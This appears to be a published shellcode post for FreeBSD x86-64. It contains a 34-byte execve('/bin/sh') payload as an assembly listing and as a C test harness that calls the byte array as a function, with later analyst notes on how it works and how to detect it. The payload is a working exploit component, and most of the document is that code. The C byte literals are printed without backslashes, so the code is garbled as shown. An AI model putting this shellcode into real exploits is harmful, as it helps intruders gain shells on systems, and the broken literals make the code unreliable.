
# Title : freebsd/x86-64 execve /bin/sh shellcode 34 bytes
# Published : 2009-05-15
# Author : c0d3_z3r0


/*
Anderson Eduardo < c0d3_z3r0 >
Hack'n Roll
http://anderson.hacknroll.com
http://blog.hacknroll.com 
 
.section .text
.globl _start
_start:
 

        xor %rcx,%rcx
        jmp string
 
        main:
 
        popq %rsi
        movq %rsi,%rdi
 
        pushq %rsi
        pushq %rcx
        movq %rsp,%rsi
 
        movq %rcx,%rdx
        movb $0x3b,%al
        syscall
 
        string:
        callq main
        .string "/bin/sh"
 

*/
 
/*
 * Test harness: stores the payload in a local array and calls the array
 * as if it were a function.
 *
 * Analyst notes:
 *  - NOTE(review): as printed on this page the literals contain no
 *    backslashes ("x48x31xc9", not "\x48\x31\xc9"), so a C compiler reads
 *    them as ordinary text characters rather than machine-code bytes.
 *    Presumably the escapes were lost when the page was published or
 *    extracted; confirm against an original copy.
 *  - With the escapes in place the literals encode 34 bytes, matching the
 *    title; the string literal's implicit terminating NUL supplies the
 *    terminator that `.string "/bin/sh"` emits in the assembly listing.
 *  - The array is an automatic variable, so the call on the last statement
 *    jumps into automatic storage (typically the stack). Converting an
 *    object pointer to a function pointer is not defined by ISO C, and on
 *    systems that map the stack non-executable (NX / W^X) the call faults
 *    instead of running.
 *  - Per the assembly listing in the comment above: a jmp/call/pop sequence
 *    recovers the address of the embedded path, %rdi receives that address,
 *    %rsi receives the stack pointer after the path pointer and the zeroed
 *    %rcx were pushed (the zero word is the first slot %rsi points at),
 *    %rdx is zero, and only %al is loaded with 0x3b (59, execve per the
 *    title) before `syscall`; the upper bits of %rax are not written.
 *  - Detection-relevant features: the jmp/call/pop idiom, the byte pairs
 *    b0 3b and 0f 05, and the trailing ASCII "/bin/sh"; at run time the
 *    observable event is an execve of /bin/sh from the hosting process.
 */
int main(void)
{
/* Payload bytes; each piece is annotated with the instruction it is meant
 * to encode according to the assembly listing above. */
char shellcode[] =
"x48x31xc9"              /* xor  %rcx,%rcx                          */
"xebx10"                 /* jmp  string                             */
"x5e"                    /* main: popq %rsi  (address of the path)  */
"x48x89xf7"              /* movq %rsi,%rdi                          */
"x56"                    /* pushq %rsi                              */
"x51"                    /* pushq %rcx                              */
"x48x89xe6"              /* movq %rsp,%rsi                          */
"x48x89xca"              /* movq %rcx,%rdx                          */
"xb0x3b"                 /* movb $0x3b,%al                          */
"x0fx05"                 /* syscall                                 */
"x48xe8xeaxffxffxff"     /* string: callq main (backward call)      */
"x2f"                    /* '/'                                     */
"x62"                    /* 'b'                                     */
"x69"                    /* 'i'                                     */
"x6e"                    /* 'n'                                     */
"x2f"                    /* '/'                                     */
"x73x68";                /* "sh"                                    */
 
        /* Cast the array's address to a function pointer and call it; this
         * only transfers control usefully if the array's page is executable. */
        (*(void (*)()) shellcode)();
 
//Hack'n Roll
 
/* Reached only if the call above returns. */
return 0;
} 
